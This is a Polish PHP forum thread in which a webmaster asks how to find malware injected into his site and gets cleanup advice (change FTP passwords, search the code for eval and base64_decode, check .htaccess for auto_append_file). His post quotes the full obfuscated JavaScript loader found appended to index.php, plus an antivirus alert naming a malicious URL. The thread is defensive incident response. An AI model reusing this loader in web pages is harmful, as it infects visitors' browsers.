Forum PHP.pl > Wirus na stronie w JS

Pomoc - Szukaj - Użytkownicy - Kalendarz

Forum PHP.pl > Forum > Po stronie przeglądarki

Azami

11.10.2012, 00:08:01

Witam
Od jakiegoś czasu mam problem ze stroną. Co jakiś czas jak wchodzę pojawia mi ise alert o wirusie. Gdy się to dzieje w kodzoe źrudłowym w przeglądarce na końcu dopisuje mi się kod:

[PHP] pobierz, plaintext 
<script>v="val";try{faweb++}catch(btawetb){try{fve^32}catch(btawt4){w=window;e=w["e"+v];}}
if(1){f=new Array(9,8,103,102,31,38,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,114,64,121,83,95,103,77,95,109,100,38,39,97,109,100,120,37,41,90,46,93,40,121,13,8,7,9,104,100,114,96,107,101,113,38,41,58,11,9,8,123,32,100,106,115,100,30,123,12,7,9,8,98,111,98,115,109,100,108,116,45,117,114,104,114,101,39,32,60,104,100,114,96,107,101,31,113,114,98,59,39,103,114,116,111,56,47,46,114,114,104,110,112,104,108,103,110,96,115,110,106,101,115,99,46,97,103,122,46,97,97,38,30,119,104,98,116,103,59,39,48,46,39,31,102,101,104,101,104,115,59,39,48,46,39,31,113,116,120,106,101,60,37,118,104,113,105,97,103,108,104,114,121,57,102,105,99,98,101,109,57,112,110,113,105,115,103,111,109,56,97,97,113,111,107,115,116,100,57,108,100,100,116,57,46,59,115,109,112,57,46,59,38,60,60,46,103,102,113,95,109,100,60,34,40,57,13,8,7,125,12,7,9,101,115,110,98,114,105,110,108,32,104,100,114,96,107,101,113,38,41,122,11,9,8,7,118,96,112,32,101,30,61,31,98,111,98,115,109,100,108,116,45,97,114,100,95,116,100,67,108,100,107,101,109,114,40,38,103,102,113,95,109,100,37,41,58,100,46,114,99,116,64,114,116,113,103,98,116,114,101,39,37,115,113,97,39,43,37,104,115,114,112,57,45,47,115,112,105,111,110,105,109,101,111,97,113,111,107,99,116,100,44,98,104,120,47,98,95,39,40,57,102,45,113,116,120,106,101,45,116,105,114,103,98,104,106,105,115,119,61,38,102,105,99,98,101,109,37,59,101,44,115,115,119,108,100,44,112,110,113,105,115,103,111,109,59,39,96,96,115,110,106,117,115,99,39,58,100,46,114,114,121,107,99,46,107,99,102,115,59,39,47,37,59,101,44,115,115,119,108,100,44,116,110,110,61,38,46,39,58,100,46,114,99,116,64,114,116,113,103,98,116,114,101,39,37,119,104,98,116,103,37,44,38,47,48,38,39,59,101,44,115,100,114,65,115,114,114,104,96,117,115,99,40,38,102,101,104,101,104,115,37,44,38,47,48,38,39,59,12,7,9,8,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107,101,109,114,115,65,119,84,96,101,78,96,107,101,39,37,98,110,98,121,38,39,91,47,91,46,96,110,112,100,108,100,66,102,105,107,98,40,101,39,59,12,7,9,124);}w=f;s=[];r=String;x="j%";for(i=0;-i+569!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCharCode"]((1*w[j]+e(x+3)));}
if(0x10==020)try{(w+s)()}catch(asga){e("if(1)"+s+"");}</script>
[PHP] pobierz, plaintext

dodatkowo Kasperski zwraca komunikat:

[PHP] pobierz, plaintext 
ca	Zabroniono: [url="http://trippingobsolete.biz/ca"]http://trippingobsolete.biz/ca[/url] (analiza z wykorzystaniem bazy podejrzanych adresów URL)	2012-10-10 21:40:16
[PHP] pobierz, plaintext

Jak namierzyć gdzie się to zagnieździło ? Bądź czym to usunąć ?
Strona jest ogromna i całość serwisu składa się z kilku tysięcy przeróżnych plików. Na szczęście wirus pojawia się tylko przy opalaniu index.php ale mimo to nie mogę namierzyć gdzie to siedzi.
Każdy pomysł lub podpowiedź mile widziana.

Pozdrawiam

rocktech.pl

11.10.2012, 08:46:03

Witam.

1. Zmień hasła na FTP i nie zapisuj ich nigdzie!
2. Zainstaluj antwirusa.
3. Zmień klienta FTP z TotalComandera na inny

Co do problemu pozostaje ci przelecieć całe źródla aplikacji na serwerze i wyszukać następujące frazy:

eval
function_exist
base64_decode

Jak zobaczysz kod napisany ciurkiem, nic nie znaczące nazwy funkcji i zakodowane ciągi znaków to tnij!
Sprawdź .htaccess pod kątem.

[APACHE] pobierz, plaintext 
php_value auto_append_file ...
[APACHE] pobierz, plaintext

Azami

11.10.2012, 17:20:45

Wielkie dzięki za pomoc , po przeszukaniu serwera pod kontem wymienionych komend znalazłem złośliwy kod

Pozdrawiam

To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.